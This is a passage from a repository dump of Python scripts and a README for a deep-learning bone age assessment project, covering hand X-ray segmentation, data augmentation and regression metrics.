15\nXCEPTION_MID = \"1\"\nXCEPTION_MID_START = 35\nXCEPTION_EXIT = \"2\"\nXCEPTION_EXIT_START = 116\n" }, { "alpha_fraction": 0.5758620500564575, "alphanum_fraction": 0.5850574970245361, "avg_line_length": 21.33333396911621, "blob_id": "1028d595b639562d4e18b05cc057ff95f46b6c56", "content_id": "7f27c5aaed40865a694ad98c1034820ced1dca22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 870, "license_type": "no_license", "max_line_length": 79, "num_lines": 39, "path": "/al_segmentation/step3_check_data.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\n\nfrom glob import glob\n\nimport utils_data\nfrom config import *\n\n\ndef get_miss_ids():\n data_dir = \"./interactive_segmentation_dice1.0_pixel1.0_GPU0/segmented_all\"\n\n data_files = glob(data_dir + \"/*_crop_seg.png\")\n\n existed_ids = []\n for data_file in data_files:\n data_id = data_file[data_file.rfind(\"/\") + 1: data_file.find(\"_crop\")]\n existed_ids.append(data_id)\n\n all_ids = []\n data_files = glob(RSNA_DATA_DIR + \"/*.png\")\n for data_file in data_files:\n data_id = data_file[data_file.rfind(\"/\") + 1: data_file.find(\".png\")]\n all_ids.append(data_id)\n\n for id in existed_ids:\n all_ids.remove(id)\n\n return all_ids\n\n\ndef check_all():\n missed_ids = get_miss_ids()\n if len(missed_ids) == 0:\n print \"!!!!\"\n else:\n print missed_ids\n\nif __name__ == \"__main__\":\n check_all()" }, { "alpha_fraction": 0.6081143617630005, "alphanum_fraction": 0.6242508292198181, "avg_line_length": 33.412696838378906, "blob_id": "48e79d8579d93a0a11bd2d3cade5d8b45d318ad5", "content_id": "176328f7e9cc183d0bbb497b2d33221dbc8009cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2169, "license_type": "no_license", "max_line_length": 126, "num_lines": 63, "path": "/paced_transfer/utils_metric.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, median_absolute_error, r2_score, explained_variance_score\nfrom sklearn.metrics import roc_curve, roc_auc_score, precision_recall_curve\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\ndef regression_metric(y_true, y_pred):\n # explained_variance_score\n evs = explained_variance_score(y_true, y_pred)\n # mean_absolute_error\n mae = mean_absolute_error(y_true, y_pred)\n # mean_squared_error\n mse = mean_squared_error(y_true, y_pred)\n # median_absolute_error\n meae = median_absolute_error(y_true, y_pred)\n # r^2_score\n r2s = r2_score(y_true, y_pred)\n ccc = _ccc(y_true, y_pred)\n return evs, mae, mse, meae, r2s, ccc\n\n\ndef _ccc(y_true, y_pred):\n x_mean = np.average(y_true)\n y_mean = np.average(y_pred)\n n = y_true.shape[0]\n s_xy = np.sum(np.multiply(y_true-x_mean, y_pred-y_mean)) / n\n s_x2 = np.sum([np.power(e, 2) for e in (y_true - x_mean)]) / n\n s_y2 = np.sum([np.power(e, 2) for e in (y_pred - y_mean)]) / n\n return 2*s_xy / (s_x2+s_y2+np.power(x_mean-y_mean, 2))\n\n\ndef AUC_ROC(true_vessel_arr, pred_vessel_arr):\n \"\"\"\n Area under the ROC curve with x axis flipped\n \"\"\"\n fpr, tpr, _ = roc_curve(true_vessel_arr, pred_vessel_arr)\n AUC_ROC = roc_auc_score(true_vessel_arr.flatten(), pred_vessel_arr.flatten())\n return AUC_ROC, fpr, tpr\n\n\ndef AUC_PR(true_vessel_img, pred_vessel_img):\n \"\"\"\n Precision-recall curve\n \"\"\"\n try:\n precision, recall, _ = precision_recall_curve(true_vessel_img.flatten(), pred_vessel_img.flatten(), pos_label=1)\n AUC_prec_rec = auc(recall, precision)\n return AUC_prec_rec, precision, recall\n except:\n return 0.\n\n\ndef classify_metrics(y_true, y_pred):\n \"\"\"\n cm = confusion_matrix(y_true, y_pred)\n acc = 1. * (cm[0, 0] + cm[1, 1]) / np.sum(cm)\n sensitivity = 1. * cm[1, 1] / (cm[1, 0] + cm[1, 1])\n specificity = 1. * cm[0, 0] / (cm[0, 1] + cm[0, 0])\n return acc, sensitivity, specificity\n \"\"\"\n acc = accuracy_score(y_true, y_pred)\n return acc\n\n" }, { "alpha_fraction": 0.473026305437088, "alphanum_fraction": 0.4802631437778473, "avg_line_length": 32.065216064453125, "blob_id": "5a33ae5bc1b4279ac15014159c2e94839477648c", "content_id": "960901b86f5c63c9b11e0184c6799bda517ce116", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1520, "license_type": "no_license", "max_line_length": 120, "num_lines": 46, "path": "/al_segmentation/step5_statiscal_data.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import argparse\nimport pprint\nimport numpy as np\nimport os\n\nfrom glob import glob\nfrom utils_data import load_obj\nfrom config import *\n\n\nmodel_names = [\"inception_v3\", \"inception_resnet_v2\", \"xception\"]\nsexs = [\"0\", \"1\", \"2\"]\nfine_tunes = [\"0\", \"3\"]\naugments = [\"True\"]\nkeys = [\"evs\", \"mae\", \"mse\", \"meae\", \"r2s\", \"ccc\"]\n\n\ndef best_value(data_dir, key=\"mae\", min=True):\n metric_objs = glob(data_dir+\"/*.pkl\")\n values = []\n if len(metric_objs) != N_TRAINING_EPOCH:\n return 0.0\n for i in range(N_TRAINING_EPOCH):\n obj = load_obj(data_dir+\"/epoch_{}.pkl\".format(i))\n value = obj[key]\n values.append(value)\n if min:\n return np.min(values)\n else:\n return np.max(values)\n\n\n\nfor model_name in model_names:\n for fine_tune in fine_tunes:\n for sex in sexs:\n for augment in augments:\n metric_out_dir = \"E{}_M{}_S{}_A{}_F{}/metric\".format(\"regression2\", model_name, sex, augment, fine_tune)\n # print metric_dir\n if os.path.isdir(metric_out_dir):\n print \"==========================================================================================\"\n print metric_out_dir\n for key in keys:\n print \"{}, min: {}, max: {}\".format(key,\n best_value(metric_out_dir, key, True),\n best_value(metric_out_dir, key, False))" }, { "alpha_fraction": 0.6432502269744873, "alphanum_fraction": 0.6655875444412231, "avg_line_length": 28.150943756103516, "blob_id": "fa02281055e82c72e17855b9597a7f71df425d23", "content_id": "955027c67858a19872ef4114c64878c6dfc20131", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3089, "license_type": "no_license", "max_line_length": 101, "num_lines": 106, "path": "/al_segmentation/step8_img_contrast.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport os\n\nfrom skimage import data, img_as_float\nfrom skimage import exposure\nfrom config import *\nfrom glob import glob\nfrom tqdm import tqdm\n\n\"\"\"\nmatplotlib.rcParams['font.size'] = 8\ndef plot_img_and_hist(img, axes, bins=256):\n img = img_as_float(img)\n ax_img, ax_hist = axes\n ax_cdf = ax_hist.twinx()\n\n # Display image\n ax_img.imshow(img, cmap=plt.cm.gray)\n ax_img.set_axis_off()\n ax_img.set_adjustable('box-forced')\n\n # Display histogram\n ax_hist.hist(img.ravel(), bins=bins, histtype='step', color='black')\n ax_hist.ticklabel_format(axis='y', style='scientific', scilimits=(0, 0))\n ax_hist.set_xlabel('Pixel intensity')\n ax_hist.set_xlim(0, 1)\n ax_hist.set_yticks([])\n\n # Display cumulative distribution\n img_cdf, bins = exposure.cumulative_distribution(img, bins)\n ax_cdf.plot(bins, img_cdf, 'r')\n ax_cdf.set_yticks([])\n\n return ax_img, ax_hist, ax_cdf\n\n\n# Load an example image\nimg = cv2.imread(RSNA_SEG_ALL+\"/14879_seg.png\", cv2.IMREAD_GRAYSCALE)\n\n# Contrast stretching\np2, p98 = np.percentile(img, (2, 98))\nimg_rescale = exposure.rescale_intensity(img, in_range=(p2, p98))\n\n# Equalization\nimg_eq = exposure.equalize_hist(img)\n\n# Adaptive Equalization\nimg_adapteq = exposure.equalize_adapthist(img, clip_limit=0.03)\n\n# Display results\nfig = plt.figure(figsize=(8, 5))\naxes = np.zeros((2, 4), dtype=np.object)\naxes[0, 0] = fig.add_subplot(2, 4, 1)\nfor i in range(1, 4):\n axes[0, i] = fig.add_subplot(2, 4, 1+i, sharex=axes[0,0], sharey=axes[0,0])\nfor i in range(0, 4):\n axes[1, i] = fig.add_subplot(2, 4, 5+i)\n\nax_img, ax_hist, ax_cdf = plot_img_and_hist(img, axes[:, 0])\nax_img.set_title('Low contrast image')\n\ny_min, y_max = ax_hist.get_ylim()\nax_hist.set_ylabel('Number of pixels')\nax_hist.set_yticks(np.linspace(0, y_max, 5))\n\nax_img, ax_hist, ax_cdf = plot_img_and_hist(img_rescale, axes[:, 1])\nax_img.set_title('Contrast stretching')\n\nax_img, ax_hist, ax_cdf = plot_img_and_hist(img_eq, axes[:, 2])\nax_img.set_title('Histogram equalization')\n\nax_img, ax_hist, ax_cdf = plot_img_and_hist(img_adapteq, axes[:, 3])\nax_img.set_title('Adaptive equalization')\n\nax_cdf.set_ylabel('Fraction of total intensity')\nax_cdf.set_yticks(np.linspace(0, 1, 5))\n\n# prevent overlap of y-axis labels\nfig.tight_layout()\nplt.show()\n\"\"\"\n\n\ndef enhance_image(img):\n img_adapteq = exposure.equalize_adapthist(img, clip_limit=0.03)\n return img_adapteq\n\n\ndef enhance_all():\n output_dir = RSNA_SEG_ENHANCE\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n img_files = glob(RSNA_SEG_ALL + \"/*.*\")\n for img_file in tqdm(img_files):\n img_name = img_file[img_file.rfind(\"/\")+1: img_file.rfind(\"_seg\")]\n img = cv2.imread(img_file, cv2.IMREAD_GRAYSCALE)\n img_enh = enhance_image(img)\n plt.imsave(fname=RSNA_SEG_ENHANCE + \"/{}_seg.png\".format(img_name), arr=img_enh, cmap=\"gray\")\n #cv2.imwrite(RSNA_SEG_ENHANCE + \"/{}_seg.png\".format(img_name), img_enh)\n\nif __name__ == \"__main__\":\n enhance_all()" }, { "alpha_fraction": 0.6078431606292725, "alphanum_fraction": 0.6259230971336365, "avg_line_length": 33.30131149291992, "blob_id": "d4caecfc8848bce6094ad1885e26def10bd9bb12", "content_id": "101a14717bf70c3893c600f12812e549478a3779", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7854, "license_type": "no_license", "max_line_length": 126, "num_lines": 229, "path": "/paced_transfer/utils_data.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport cv2\nimport os\nimport pickle\nimport h5py\nimport keras\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, median_absolute_error, r2_score, explained_variance_score\nfrom tqdm import tqdm\nfrom utils_training import _batch_cvt\nfrom config import *\n\n\n\"\"\"\ndef load_data(sex=0, img_size=256, augment=False, preprocess_fn=inception_v3_input, debug=False, regression=True):\n data_dir = RSNA_SEG_ENHANCE\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n if sex == 0:\n boneages = dataset_df.boneage\n ids = dataset_df.id\n elif sex == 1:\n boneages = dataset_df[dataset_df.male==True].boneage\n ids = dataset_df[dataset_df.male==True].id\n elif sex == 2:\n boneages = dataset_df[dataset_df.male==False].boneage\n ids = dataset_df[dataset_df.male==False].id\n\n bas_l = []\n ids_l = []\n if debug:\n ids = ids[:100]\n\n n_data = len(ids)\n for i in range(len(ids)):\n boneage = boneages.ix[boneages.index[i]]\n ids_l.append(ids.ix[ids.index[i]])\n bas_l.append(boneage)\n\n x = []\n y = []\n for i in tqdm(range(n_data)):\n id = ids_l[i]\n boneage = bas_l[i]\n img_file_name = data_dir + \"/{}_seg.png\".format(id)\n if os.path.isfile(img_file_name):\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n img = np.array(img, dtype=np.float32)\n img = preprocess_fn(img)\n x.append(img)\n y.append(boneage)\n\n if augment:\n flipped = cv2.flip(img, 1) # horzational flip\n for angle in range(-60, 61, 30):\n M = cv2.getRotationMatrix2D(center=(img.shape[0]/2, img.shape[1]/2), angle=angle, scale=1)\n dst_ori = cv2.warpAffine(img, M, (img.shape[0], img.shape[1]))\n dst_flip = cv2.warpAffine(flipped, M, (img.shape[0], img.shape[1]))\n x.append(dst_ori)\n x.append(dst_flip)\n\n y.append(boneage)\n y.append(boneage)\n\n x = np.array(x, dtype=np.float32)\n if regression:\n y = np.array(y, dtype=np.float32)\n y = y/SCALE\n else:\n y = np.array(y, dtype=np.int32)\n y = keras.utils.to_categorical(y, num_classes=int(SCALE))\n y = np.array(y, dtype=np.float32)\n\n print \"[x] load %d data\" % x.shape[0]\n return x, y\n\"\"\"\n\ndef save_obj(obj, name):\n with open(name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(name):\n with open(name, 'rb') as f:\n return pickle.load(f)\n\n\ndef load_hdf5(infile, key=\"data\"):\n with h5py.File(infile, \"r\") as f:\n return f[key][()]\n\n\ndef write_hdf5(value, outfile, key=\"data\"):\n with h5py.File(outfile, \"w\") as f:\n f.create_dataset(key, data=value, dtype=value.dtype)\n\n\ndef load_sex_ids(sex=0):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n ids = []\n if sex == 0:\n for i in range(len(dataset_df.index)):\n id = dataset_df.ix[dataset_df.index[i]]['id']\n ids.append(id)\n elif sex == 1:\n sex_df = dataset_df[dataset_df.male == True]\n for i in range(len(sex_df.index)):\n id = dataset_df.ix[sex_df.index[i]]['id']\n ids.append(id)\n elif sex == 2:\n sex_df = dataset_df[dataset_df.male == False]\n for i in range(len(sex_df.index)):\n id = dataset_df.ix[sex_df.index[i]]['id']\n ids.append(id)\n\n return np.array(ids)\n\n\ndef load_data(sex=0, img_size=299, batch_size=32, augment_times=5):\n data_ids = load_sex_ids(sex)\n select_ids = np.random.permutation(data_ids)[:batch_size]\n batch_x, batch_y = augment_data_with_ids(select_ids, img_size, augment_times=augment_times)\n return _batch_cvt(batch_x), batch_y\n\n\ndef augment_data_with_ids(ids, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_SEG_ENHANCE, augment_times=5):\n imgs = []\n boneages = []\n for id in ids:\n ims, bas = _augment_data_with_id(id, img_size, preprocess_fn, data_dir, augment_times)\n imgs.extend(ims)\n boneages.extend(bas)\n\n imgs = np.array(imgs, dtype=np.float32)\n boneages = np.array(boneages, dtype=np.float32)\n indexes = np.random.permutation(range(imgs.shape[0]))\n imgs = imgs[indexes]\n boneages = boneages[indexes]\n return imgs, boneages\n\n\ndef load_data_sex(sex, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_SEG_ENHANCE):\n ids = load_sex_ids(sex)\n imgs = []\n boneages = []\n for _id in tqdm(ids):\n img, boneage = load_single_with_id(_id, img_size, preprocess_fn, data_dir)\n imgs.append(img)\n boneages.append(boneage)\n return np.array(imgs, dtype=np.float32), np.array(boneages, dtype=np.float32)\n\n\ndef load_single_with_id(_id, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_SEG_ENHANCE):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n boneage = dataset_df.loc[dataset_df[\"id\"] == _id].boneage.values[0] / SCALE\n img_file_name = data_dir + \"/{}_seg.png\".format(_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_COLOR)\n img = cv2.resize(img, (img_size, img_size))\n img = preprocess_fn(np.array(img, dtype=np.float32))\n return img, boneage\n\n\ndef _augment_data_with_id(_id, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_SEG_ENHANCE, augment_times=5):\n \"\"\"\n Online sampling with data augmentation\n :param _id:\n :param img_size:\n :param preprocess_fn:\n :param dataset_df:\n :param data_dir:\n :param augment_times:\n :return:\n \"\"\"\n imgs = []\n boneages = []\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n\n boneage = dataset_df.loc[dataset_df[\"id\"]==_id].boneage.values[0] / SCALE\n img_file_name = data_dir + \"/{}_seg.png\".format(_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n\n imgs.append(preprocess_fn(np.array(img, dtype=np.float32)))\n boneages.append(boneage)\n\n if augment_times > 0:\n flipped = cv2.flip(img, 1) # horzational flip\n imgs.append(preprocess_fn(np.array(flipped, dtype=np.float32)))\n boneages.append(boneage)\n for i in range(augment_times):\n angle = np.random.randint(0, 360)\n M = cv2.getRotationMatrix2D(center=(img.shape[0] / 2, img.shape[1] / 2), angle=angle, scale=1)\n dst_ori = cv2.warpAffine(img, M, (img.shape[0], img.shape[1]), borderMode=cv2.BORDER_CONSTANT, borderValue=0)\n dst_flip = cv2.warpAffine(flipped, M, (img.shape[0], img.shape[1]), borderMode=cv2.BORDER_CONSTANT, borderValue=0)\n imgs.append(preprocess_fn(np.array(dst_ori, dtype=np.float32)))\n imgs.append(preprocess_fn(np.array(dst_flip, dtype=np.float32)))\n\n boneages.append(boneage)\n boneages.append(boneage)\n\n return imgs, boneages\n\n\nif __name__ == \"__main__\":\n \"\"\"\n data_x, data_y = \\\n load_data(sex=0, img_size=256, augment=False, preprocess_fn=inception_v3_input, debug=True, regression=False)\n \"\"\"\n import matplotlib.pyplot as plt\n\n imgs, boneages = load_data_sex(1)\n\n print imgs.shape\n print boneages.shape" }, { "alpha_fraction": 0.5756087303161621, "alphanum_fraction": 0.5897278785705566, "avg_line_length": 31.586666107177734, "blob_id": "32cba737ec5330a347f3038bc2a19571b7ee75cf", "content_id": "55ef05c92e7b271e196d4d4a344767a7d73690e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4887, "license_type": "no_license", "max_line_length": 97, "num_lines": 150, "path": "/al_segmentation/utils_data.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport pickle\nimport os\nimport h5py\n\nfrom tqdm import tqdm\nfrom glob import glob\nfrom config import *\n\n\ndef _read_and_resize(files):\n \"\"\"\n read images and pad images to rect\n :param files:\n :return:\n \"\"\"\n data = []\n for f in tqdm(files):\n img = cv2.imread(f, cv2.IMREAD_GRAYSCALE)\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n img = np.pad(img, pad_tuple, mode=\"constant\")\n img = cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE), interpolation=cv2.INTER_AREA)\n data.append(img)\n return data\n\n\ndef load_unannotated_data(data_dir=RSNA_DATA_DIR, annotated_ids=[]):\n data_images = glob(data_dir+\"/*.png\")\n data_x_files = []\n unannotated_ids = []\n for data_image in data_images:\n data_id = data_image[data_image.rfind(\"/\")+1: data_image.rfind(\".\")]\n if data_id not in annotated_ids:\n data_x_files.append(data_image)\n unannotated_ids.append(data_id)\n\n data_x = np.expand_dims(np.asarray(_read_and_resize(data_x_files), dtype=np.float32), axis=3)\n return data_x, unannotated_ids\n\n\ndef load_unannotated_data_np(data_dir=RSNA_GT_NP_UNANNOTATED, annotated_ids=[]):\n image_x_files = glob(data_dir + \"/*_x.h5\")\n unannotated_ids = []\n data_x = []\n for image_x_file in image_x_files:\n data_id = image_x_file[image_x_file.rfind(\"/\")+1: image_x_file.find(\"_\")]\n if data_id not in annotated_ids:\n image_x = load_hdf5(image_x_file)\n data_x.append(image_x)\n unannotated_ids.append(data_id)\n\n data_x = np.expand_dims(np.asarray(data_x, dtype=np.float32), axis=3)\n return data_x, unannotated_ids\n\n\ndef load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=False):\n image_x_files = glob(data_dir+\"/*_x.h5\")\n if return_ids:\n data_ids = []\n for image_x_file in image_x_files:\n data_id = image_x_file[image_x_file.rfind(\"/\")+1: image_x_file.find(\"_\")]\n data_ids.append(data_id)\n return data_ids\n else:\n data_x = []\n data_y = []\n data_ids = []\n for i in range(len(image_x_files)):\n image_x_file = image_x_files[i]\n data_id = image_x_file[image_x_file.rfind(\"/\")+1: image_x_file.find(\"_\")]\n image_y_file = RSNA_GT_NP_ANNOTATED + \"/{}_y.h5\".format(data_id)\n image_x = load_hdf5(image_x_file)\n image_y = load_hdf5(image_y_file)\n data_x.append(image_x)\n data_y.append(image_y)\n data_ids.append(data_id)\n\n data_x = np.expand_dims(np.asarray(data_x, dtype=np.float32), axis=3)\n data_y = np.expand_dims(np.asarray(data_y, dtype=np.float32), axis=3)\n return data_x, data_y, data_ids\n\n\ndef load_annotated_data(data_dir=RSNA_SEGMENT_SAVE_DIR, return_ids=False):\n image_files = glob(data_dir+\"/*.png\")\n data_x_files = []\n data_y_files = []\n gt_ids = []\n for data_file in image_files:\n data_id = data_file[data_file.rfind('/')+1: data_file.find('_')]\n if data_id in gt_ids:\n continue\n else:\n x_image_path = data_dir + \"/{}_ori.png\".format(data_id)\n data_x_files.append(x_image_path)\n y_image_path = data_dir + \"/{}_bin.png\".format(data_id)\n data_y_files.append(y_image_path)\n gt_ids.append(data_id)\n if return_ids:\n return gt_ids\n\n data_x = np.expand_dims(np.asarray(_read_and_resize(data_x_files), dtype=np.float32), axis=3)\n data_y = np.expand_dims(np.asarray(_read_and_resize(data_y_files), dtype=np.float32), axis=3)\n return data_x, data_y\n\n\ndef shuffle_data(data_x, data_y):\n n_data = data_x.shape[0]\n new_indexes = np.random.permutation(n_data)\n return data_x[new_indexes], data_y[new_indexes], new_indexes\n\n\ndef save_obj(obj, name):\n with open(name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(name):\n with open(name, 'rb') as f:\n return pickle.load(f)\n\n\ndef similarity_cosine(vec1, vec2):\n vec1 = np.array(vec1).flatten()\n vec2 = np.array(vec2).flatten()\n return np.dot(vec1, vec2) / (np.sqrt((vec1**2).sum()) * np.sqrt((vec2**2).sum()))\n\n\ndef euler_distance(vec1, vec2):\n return np.sum(np.power(np.subtract(vec1, vec2), 2))\n\n\ndef load_hdf5(infile, key=\"data\"):\n with h5py.File(infile, \"r\") as f:\n return f[key][()]\n\n\ndef write_hdf5(value, outfile, key=\"data\"):\n with h5py.File(outfile, \"w\") as f:\n f.create_dataset(key, data=value, dtype=value.dtype)\n\n\nif __name__ == '__main__':\n #load_annotated_data(data_dir=RSNA_GT, return_ids=True)\n load_unannotated_data(data_dir=RSNA_DATA_DIR, annotated_ids=[])" }, { "alpha_fraction": 0.682692289352417, "alphanum_fraction": 0.7115384340286255, "avg_line_length": 34, "blob_id": "599219149590c831038ea045ffff4ebaab1c0e20", "content_id": "508ee15ee6a48bbf0a5470bfb5febc616de6321a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "no_license", "max_line_length": 51, "num_lines": 3, "path": "/vallina_transfer_learning/config.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "RSNA_TRAIN_CSV = \"./data/csv/train.csv\"\nRSNA_TRAIN_DATA = \"./data/boneage-training-dataset\"\nSCALE = 228." }, { "alpha_fraction": 0.5826042294502258, "alphanum_fraction": 0.5903242230415344, "avg_line_length": 34.6422004699707, "blob_id": "eb49eafca99434fca880f7111b4c1d1cb4299f3f", "content_id": "0d9abb86609c927e39d2603319535143454c3bf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3886, "license_type": "no_license", "max_line_length": 106, "num_lines": 109, "path": "/al_segmentation/step1_corase_segment.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "from glob import glob\nimport os\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport argparse\n\nfrom PIL import Image\nfrom PIL import ImageEnhance\nfrom skimage import morphology, measure\nfrom skimage.filters import threshold_otsu\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\n\nfrom config import *\n\n\ndef load_and_pad(data_file):\n img = cv2.imread(data_file, cv2.IMREAD_GRAYSCALE)\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n padded = np.pad(img, pad_tuple, mode=\"constant\")\n return padded\n\n\ndef image_enhance_seg(img_files, dilation_k=(5, 5), single_dir=False):\n for i in tqdm(range(len(img_files))):\n data_img_file = img_files[i]\n file_name = data_img_file[data_img_file.rfind(\"/\")+1:data_img_file.rfind(\".\")]\n print \"[x] processing image file %s \" % file_name\n\n img = Image.open(data_img_file)\n img = img.convert('L')\n ori_img = img.convert('L')\n\n enh_bri = ImageEnhance.Brightness(img)\n brightness = 5\n img = enh_bri.enhance(brightness)\n img = np.array(img)\n\n # OTSU\n thresh = threshold_otsu(img)\n binary = img > thresh * THRESH_RATIO\n binary = morphology.dilation(binary, selem=np.ones(dilation_k))\n\n labels = measure.label(binary)\n regions = measure.regionprops(labels)\n labels = [(r.area, r.label) for r in regions]\n if len(labels) > 1:\n labels.sort(reverse=True)\n max_area = labels[1][0]\n for r in regions:\n if r.area <= max_area:\n for c in r.coords:\n binary[c[0], c[1]] = False\n\n binary = morphology.dilation(binary, selem=np.ones(dilation_k))\n\n if single_dir:\n save_dir = RSNA_SEGMENT_SAVE_DIR + \"{}/\".format(file_name)\n else:\n save_dir = RSNA_SEGMENT_SAVE_DIR\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n\n # cropped img\n plt.imsave(fname=save_dir + file_name + \"_ori.png\", arr=np.array(ori_img), cmap=\"gray\")\n padded_ori_img = load_and_pad(save_dir + file_name + \"_ori.png\")\n plt.imsave(fname=save_dir + file_name + \"_pad_ori.png\", arr=padded_ori_img, cmap=\"gray\")\n\n plt.imsave(fname=save_dir + file_name + \"_bin.png\", arr=binary, cmap=plt.cm.bone)\n padded_bin_img = load_and_pad(save_dir + file_name + \"_bin.png\")\n plt.imsave(fname=save_dir + file_name + \"_pad_bin.png\", arr=padded_bin_img, cmap=plt.cm.bone)\n\n img_seg = np.multiply(ori_img, binary)\n plt.imsave(fname=save_dir + file_name + \"_seg.png\", arr=img_seg, cmap=\"gray\")\n padded_seg_img = load_and_pad(save_dir + file_name + \"_seg.png\")\n plt.imsave(fname=save_dir + file_name + \"_pad_seg.png\", arr=padded_seg_img, cmap=\"gray\")\n\n\nif __name__ == \"__main__\":\n\n data_img_files = glob(RSNA_DATA_DIR + \"*.png\")\n if not os.path.isdir(RSNA_SEGMENT_SAVE_DIR):\n os.makedirs(RSNA_SEGMENT_SAVE_DIR)\n n_images = len(data_img_files)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--num_process', type=int, help=\"number of process to run code\", default=4)\n FLAGS = parser.parse_args()\n num_process = FLAGS.num_process\n\n if num_process > 1:\n p = Pool()\n for i in range(num_process):\n if i < num_process-1:\n sub_image_files = data_img_files[i*(n_images//num_process): (i+1)*(n_images//num_process)]\n else:\n sub_image_files = data_img_files[i*(n_images//num_process):]\n p.apply_async(image_enhance_seg, args=(sub_image_files, (5, 5), False))\n\n p.close()\n p.join()\n else:\n image_enhance_seg(data_img_files)\n\n" }, { "alpha_fraction": 0.7797867655754089, "alphanum_fraction": 0.7992582321166992, "avg_line_length": 101.76190185546875, "blob_id": "c07bdd05574fd5bdf7cea84f60ddffe1387ced60", "content_id": "c14dc51a66a7c47e9a7cc37ec3f2267886be5bbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2157, "license_type": "no_license", "max_line_length": 289, "num_lines": 21, "path": "/README.MD", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "# Bone Age Assignment via Deep Learning Technique\nIn this paper, we use active learning and query by committee strategy to actively select training sample and segment hand from original X-Ray images.\n\nWe define the bone age assignment task a as regression task. With the segmented results, we fine-tune 3 state-of-the-art multi-scale CNN model, inception v3, inception resnet v2 and xception, to predict real bone age of each X-ray image.\n\nCode Usage for AL segmentation\n1. run al_segmentation/step1_corase_segment.py to generate corase segmentation with traditional image preprocessing method, including OTSU and Giant Component.\n2. run al_segmentation/step2_interactive_segmentation.py to execute interactive program. After each training epoch, oracle would like to manually segment most uncertain samples and add them to training set.\n Before running next training epoch, oracle may like to use script step2_image_2_h5.py to add new annotated samples to training set. Note that in this interactive process, new data should be located at `RSNA_GT_NEW = \"../data/gt/new\"` with names of `xxx.png (ori)` and `xxx_bin.png(GT)`.\n3. run al_segmentation/step3_check_data.py to make sure there are 12611 segmented hand images.\n4. run al_segmentation/step3_gen_segmentation_result.py to use trained segment model to inference segmentation result.\n5. run al_segmentation/step3_gen_segmentation_with_enhance.py to generate final segment results. The segmented hand with be located at `RSNA_SEG_ALL=\"../data/segment_all\"` with the size of 512*512\n6. run step4_regression_multi_gpu.py to fine-tune pretrained CNN model and make BAA.\n7. run step4_regression_with_cam.py to train model and run step6_cam.py to generate CAM\n8. run step5_statiscal_data.py to gather statistics of training result, 